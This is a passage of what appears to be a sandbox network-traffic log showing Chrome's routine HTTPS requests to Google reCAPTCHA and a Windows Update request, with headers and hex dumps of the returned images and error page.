                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:25 GMT
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  77192.168.2.1649806142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA4bYc0s2zwhr0Dhx3dOazn3Hh4p7uY3CSETn6dA6rvCiWHE9OA-nOmnfN2ANundmWGke1Bjv2xi-GV3TO2LoMbXM_R2zufPfoD0XFD4lwrhK2FVthto7931CtAU3kcdffWKVtfZ2JNZsE0pCei2Leq-gBpTy3a6KgoAUB32sE_lB_-9wzhzHVikGwjcRkW_oG1wzKT1sJC3C7lN64gfM9pbHpzGzQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=8a68f4902f9f4669 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:25 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:25 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC697INData Raw: 31 36 35 64 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 165dJFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC1378INData Raw: 44 f2 79 f0 48 a6 27 24 b0 54 de 10 a9 20 60 9f cc fe 55 93 6d 68 27 e5 ff 00 07 cb a2 b7 f5 b1 5f 55 92 e5 e4 2d 28 90 ca 24 56 66 6e 00 f5 27 f4 c7 d3 03 a5 49 6f e4 9b 88 47 98 11 d0 1c fe ef 78 ce 3a f0 46 71 8e a7 db de 96 f4 5f da 30 47 f3 a2 0e 63 74 3b 41 e1 f1 b5 86 07 27 92 7d f0 71 40 9c dc 10 51 e3 65 56 00 73 93 f3 1c b0 6c e7 9f 97 1c e3 03 eb 53 29 26 af 7b 23 58 41 7f c1 fe bf 2d 4d 2b f7 92 48 fc d7 da 81 c2 82 a5 44 7d 4f 56 e9 9e 80 64 7a d7 d3 3f 0d 6d 25 bc f8 47 a2 5c 08 11 9a 2b 7c cf 00 5f be 09 75 e3 9e 47 cc c7 1d 78 f5 e4 7c d5 3c 8d 18 f2 65 56 91 f7 10 f2 7d e2 5b 9c 70 38 3d fa fa 0f 5a fa 87 e0 fe a5 a7 5e 7c 36 d2 6d ac ef 10 dd 45 1b c7 2a 96 eb b9 d8 74 ed 9e b9 07 19 1e f4 50 92 4d a0 ad 14 e2 95 8e cb 65 d4 5a 74 2a bb
                                                                                                                                                                                                                                                                  Data Ascii: DyH'$T `Umh'_U-($Vfn'IoGx:Fq_0Gct;A'}q@QeVslS)&{#XA-M+HD}OVdz?m%G\+|_uGx|<eV}[p8=Z^|6mE*tPMeZt*
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC1378INData Raw: 9d 45 cb 2f c3 fc 8d a5 17 17 a3 d5 fa b7 df d0 c9 d6 8d c3 dc a1 90 de b3 84 f9 8c 53 a8 5c ee 27 a7 18 eb 45 36 f0 db 42 d1 c7 72 a9 e6 04 c1 2a 8a f9 39 20 e4 e7 93 9c d1 5d d1 52 49 25 fa 89 e1 a7 27 7e 4f c5 ff 00 99 d8 5e 78 96 c7 52 86 19 ad 4c 97 13 79 2e 18 31 da 00 66 1d 41 ed c9 c9 cd 71 9a 7a dd dd ab 9b 3b 39 54 44 01 91 1d 73 c0 3c 2e 38 1c 03 b7 db f9 7a d6 8d e1 cd 13 49 89 d7 4a 87 73 cd 96 f3 25 5f 30 86 53 d8 e7 20 72 3d 3f 5c d4 af 67 a7 4b 3b 5d 4e 90 fd b7 e5 49 49 91 b0 aa 47 1d c8 ea 49 ff 00 3c 70 42 ad 3a 69 c6 29 db a5 c6 e3 52 5d af ff 00 0f fd 7e 27 8f 68 d7 6e 27 2d 79 6d 2b 5b 63 26 18 90 b0 38 38 3b 40 23 27 04 f7 07 8a e8 3c 19 e1 7d 33 50 b9 92 1d e5 ed e3 dd 26 12 17 89 d9 b9 ea 19 41 19 e3 d4 7e 55 db c5 a3 d9 c1 f6 39
                                                                                                                                                                                                                                                                  Data Ascii: E/S\'E6Br*9 ]RI%'~O^xRLy.1fAqz;9TDs<.8zIJs%_0S r=?\gK;]NIIGI<pB:i)R]~'hn'-ym+[c&88;@#'<}3P&A~U9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC1378INData Raw: fd 38 ed ea 7e 1d be 3e 2e b1 8b 4f 82 cd e7 bd 52 ee d2 c3 0e de bb 57 04 bb 0c 2a ee 5c 75 ea 3d 2b c9 3c 37 e2 29 20 bc b9 fb 16 9b 0c 92 de b9 25 0a 33 2a 60 7d d5 c6 31 cb 1c e7 da bd a7 e1 15 97 8d 86 ba 2e af b4 3b 4d 37 4f 78 64 8d e4 68 82 c8 5b 00 81 b3 70 3c 9c 93 9f 4e 9e 99 55 84 65 17 17 af fc 31 ac 6a a5 2b c7 a9 6d 3c 09 79 35 ca b4 9a 55 ec 8a b8 4e b1 f1 82 c7 39 df c1 27 39 c7 61 55 6d fc 3b a8 8b a5 b3 93 4d 9a 39 06 65 8d 63 65 62 00 38 56 07 20 28 e4 9e 39 f4 e9 5e 9b 27 fc 24 d1 07 55 d6 34 b9 b8 c4 bf 68 d3 d8 16 1c 72 4a 38 c9 3d b0 2b 2d 2f fc 69 6f 7a da 8d cd a7 87 2f 24 68 c2 89 a3 47 89 ca e7 3b 41 72 72 07 5f 7f 6a e2 fa bd 26 69 ed a5 a6 89 ff 00 5f d6 9f e6 72 6f e0 3d 5d c2 35 96 89 a9 98 f6 80 4c b2 c7 92 c3 82 78 6f 6f
                                                                                                                                                                                                                                                                  Data Ascii: 8~>.ORW*\u=+<7) %3*`}1.;M7Oxdh[p<NUe1j+m<y5UN9'9aUm;M9eceb8V (9^'$U4hrJ8=+-/ioz/$hG;Arr_j&i_ro=]5Lxoo
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC902INData Raw: 3b 57 f8 b1 e1 7b 26 32 8f 0e c1 75 71 93 e4 b3 6e 7d c4 1d a4 0c a6 06 32 49 c6 3a e2 85 56 0d f2 a8 eb fe 5f d3 05 aa 6f 9b d7 e5 6f ea e5 3b bf 8b fe 32 92 16 7f ec dd 3e 37 0c cc 50 c4 cc c1 4e 57 03 e6 ed d0 7d 6a 1b 9f 8a be 39 bc 49 02 5a 59 2b 30 25 7c b8 4b 1c 90 3e 6c 74 1d b0 4d 69 de fc 6f d2 66 b5 b5 b7 97 4c c4 aa d1 ca e2 1c b6 c2 0e 76 e5 94 60 8e 38 03 b9 e7 a5 63 f8 a3 e3 7b dc 6a 8c fa 15 95 c4 4a 42 0f de 30 2c d8 03 24 e3 a9 eb db ae 3f 08 8d 57 27 ca a3 b7 f9 92 fd dd 1c bf ab ed f7 1c ee 89 e2 ef 14 69 d7 1a 9c 9a 6f d9 9a e3 52 9d 2e 2f 0f 96 d2 34 d3 83 91 bb 8e cc 78 e8 0f 3c 57 4d 3f c4 cf 89 2c 47 94 a8 50 16 ca 0b 2d dc f6 dc 71 f4 eb da b9 c9 3e 2c c9 3d a4 ed 35 9b 2c de 6c 72 c6 c1 94 36 56 55 7f 94 77 38 40 33 ce 4e 2a fd
                                                                                                                                                                                                                                                                  Data Ascii: ;W{&2uqn}2I:V_oo;2>7PNW}j9IZY+0%|K>ltMiofLv`8c{jJB0,$?W'ioR./4x<WM?,GP-q>,=5,lr6VUw8@3N*
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  78192.168.2.1649807142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:26 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA4bYc0s2zwhr0Dhx3dOazn3Hh4p7uY3CSETn6dA6rvCiWHE9OA-nOmnfN2ANundmWGke1Bjv2xi-GV3TO2LoMbXM_R2zufPfoD0XFD4lwrhK2FVthto7931CtAU3kcdffWKVtfZ2JNZsE0pCei2Leq-gBpTy3a6KgoAUB32sE_lB_-9wzhzHVikGwjcRkW_oG1wzKT1sJC3C7lN64gfM9pbHpzGzQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=8a68f4902f9f4669 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:27 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:27 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:27 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:27 UTC697INData Raw: 31 36 35 64 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 165dJFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:27 UTC1378INData Raw: 44 f2 79 f0 48 a6 27 24 b0 54 de 10 a9 20 60 9f cc fe 55 93 6d 68 27 e5 ff 00 07 cb a2 b7 f5 b1 5f 55 92 e5 e4 2d 28 90 ca 24 56 66 6e 00 f5 27 f4 c7 d3 03 a5 49 6f e4 9b 88 47 98 11 d0 1c fe ef 78 ce 3a f0 46 71 8e a7 db de 96 f4 5f da 30 47 f3 a2 0e 63 74 3b 41 e1 f1 b5 86 07 27 92 7d f0 71 40 9c dc 10 51 e3 65 56 00 73 93 f3 1c b0 6c e7 9f 97 1c e3 03 eb 53 29 26 af 7b 23 58 41 7f c1 fe bf 2d 4d 2b f7 92 48 fc d7 da 81 c2 82 a5 44 7d 4f 56 e9 9e 80 64 7a d7 d3 3f 0d 6d 25 bc f8 47 a2 5c 08 11 9a 2b 7c cf 00 5f be 09 75 e3 9e 47 cc c7 1d 78 f5 e4 7c d5 3c 8d 18 f2 65 56 91 f7 10 f2 7d e2 5b 9c 70 38 3d fa fa 0f 5a fa 87 e0 fe a5 a7 5e 7c 36 d2 6d ac ef 10 dd 45 1b c7 2a 96 eb b9 d8 74 ed 9e b9 07 19 1e f4 50 92 4d a0 ad 14 e2 95 8e cb 65 d4 5a 74 2a bb
                                                                                                                                                                                                                                                                  Data Ascii: DyH'$T `Umh'_U-($Vfn'IoGx:Fq_0Gct;A'}q@QeVslS)&{#XA-M+HD}OVdz?m%G\+|_uGx|<eV}[p8=Z^|6mE*tPMeZt*
                                                                                                                                                                                                                                                                  2024-10-29 19:10:27 UTC1378INData Raw: 9d 45 cb 2f c3 fc 8d a5 17 17 a3 d5 fa b7 df d0 c9 d6 8d c3 dc a1 90 de b3 84 f9 8c 53 a8 5c ee 27 a7 18 eb 45 36 f0 db 42 d1 c7 72 a9 e6 04 c1 2a 8a f9 39 20 e4 e7 93 9c d1 5d d1 52 49 25 fa 89 e1 a7 27 7e 4f c5 ff 00 99 d8 5e 78 96 c7 52 86 19 ad 4c 97 13 79 2e 18 31 da 00 66 1d 41 ed c9 c9 cd 71 9a 7a dd dd ab 9b 3b 39 54 44 01 91 1d 73 c0 3c 2e 38 1c 03 b7 db f9 7a d6 8d e1 cd 13 49 89 d7 4a 87 73 cd 96 f3 25 5f 30 86 53 d8 e7 20 72 3d 3f 5c d4 af 67 a7 4b 3b 5d 4e 90 fd b7 e5 49 49 91 b0 aa 47 1d c8 ea 49 ff 00 3c 70 42 ad 3a 69 c6 29 db a5 c6 e3 52 5d af ff 00 0f fd 7e 27 8f 68 d7 6e 27 2d 79 6d 2b 5b 63 26 18 90 b0 38 38 3b 40 23 27 04 f7 07 8a e8 3c 19 e1 7d 33 50 b9 92 1d e5 ed e3 dd 26 12 17 89 d9 b9 ea 19 41 19 e3 d4 7e 55 db c5 a3 d9 c1 f6 39
                                                                                                                                                                                                                                                                  Data Ascii: E/S\'E6Br*9 ]RI%'~O^xRLy.1fAqz;9TDs<.8zIJs%_0S r=?\gK;]NIIGI<pB:i)R]~'hn'-ym+[c&88;@#'<}3P&A~U9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:27 UTC1378INData Raw: fd 38 ed ea 7e 1d be 3e 2e b1 8b 4f 82 cd e7 bd 52 ee d2 c3 0e de bb 57 04 bb 0c 2a ee 5c 75 ea 3d 2b c9 3c 37 e2 29 20 bc b9 fb 16 9b 0c 92 de b9 25 0a 33 2a 60 7d d5 c6 31 cb 1c e7 da bd a7 e1 15 97 8d 86 ba 2e af b4 3b 4d 37 4f 78 64 8d e4 68 82 c8 5b 00 81 b3 70 3c 9c 93 9f 4e 9e 99 55 84 65 17 17 af fc 31 ac 6a a5 2b c7 a9 6d 3c 09 79 35 ca b4 9a 55 ec 8a b8 4e b1 f1 82 c7 39 df c1 27 39 c7 61 55 6d fc 3b a8 8b a5 b3 93 4d 9a 39 06 65 8d 63 65 62 00 38 56 07 20 28 e4 9e 39 f4 e9 5e 9b 27 fc 24 d1 07 55 d6 34 b9 b8 c4 bf 68 d3 d8 16 1c 72 4a 38 c9 3d b0 2b 2d 2f fc 69 6f 7a da 8d cd a7 87 2f 24 68 c2 89 a3 47 89 ca e7 3b 41 72 72 07 5f 7f 6a e2 fa bd 26 69 ed a5 a6 89 ff 00 5f d6 9f e6 72 6f e0 3d 5d c2 35 96 89 a9 98 f6 80 4c b2 c7 92 c3 82 78 6f 6f
                                                                                                                                                                                                                                                                  Data Ascii: 8~>.ORW*\u=+<7) %3*`}1.;M7Oxdh[p<NUe1j+m<y5UN9'9aUm;M9eceb8V (9^'$U4hrJ8=+-/ioz/$hG;Arr_j&i_ro=]5Lxoo
                                                                                                                                                                                                                                                                  2024-10-29 19:10:27 UTC902INData Raw: 3b 57 f8 b1 e1 7b 26 32 8f 0e c1 75 71 93 e4 b3 6e 7d c4 1d a4 0c a6 06 32 49 c6 3a e2 85 56 0d f2 a8 eb fe 5f d3 05 aa 6f 9b d7 e5 6f ea e5 3b bf 8b fe 32 92 16 7f ec dd 3e 37 0c cc 50 c4 cc c1 4e 57 03 e6 ed d0 7d 6a 1b 9f 8a be 39 bc 49 02 5a 59 2b 30 25 7c b8 4b 1c 90 3e 6c 74 1d b0 4d 69 de fc 6f d2 66 b5 b5 b7 97 4c c4 aa d1 ca e2 1c b6 c2 0e 76 e5 94 60 8e 38 03 b9 e7 a5 63 f8 a3 e3 7b dc 6a 8c fa 15 95 c4 4a 42 0f de 30 2c d8 03 24 e3 a9 eb db ae 3f 08 8d 57 27 ca a3 b7 f9 92 fd dd 1c bf ab ed f7 1c ee 89 e2 ef 14 69 d7 1a 9c 9a 6f d9 9a e3 52 9d 2e 2f 0f 96 d2 34 d3 83 91 bb 8e cc 78 e8 0f 3c 57 4d 3f c4 cf 89 2c 47 94 a8 50 16 ca 0b 2d dc f6 dc 71 f4 eb da b9 c9 3e 2c c9 3d a4 ed 35 9b 2c de 6c 72 c6 c1 94 36 56 55 7f 94 77 38 40 33 ce 4e 2a fd
                                                                                                                                                                                                                                                                  Data Ascii: ;W{&2uqn}2I:V_oo;2>7PNW}j9IZY+0%|K>ltMiofLv`8c{jJB0,$?W'ioR./4x<WM?,GP-q>,=5,lr6VUw8@3N*
                                                                                                                                                                                                                                                                  2024-10-29 19:10:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  79192.168.2.16498084.245.163.56443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:30 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ywH7FaLO6aH19wT&MD=noSDGOKd HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                  2024-10-29 19:10:30 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                  MS-CorrelationId: 4d0643c1-8e2d-40ed-94b0-11e7b2981d5e
                                                                                                                                                                                                                                                                  MS-RequestId: 7beca156-f0dd-4a70-a940-5819953ad633
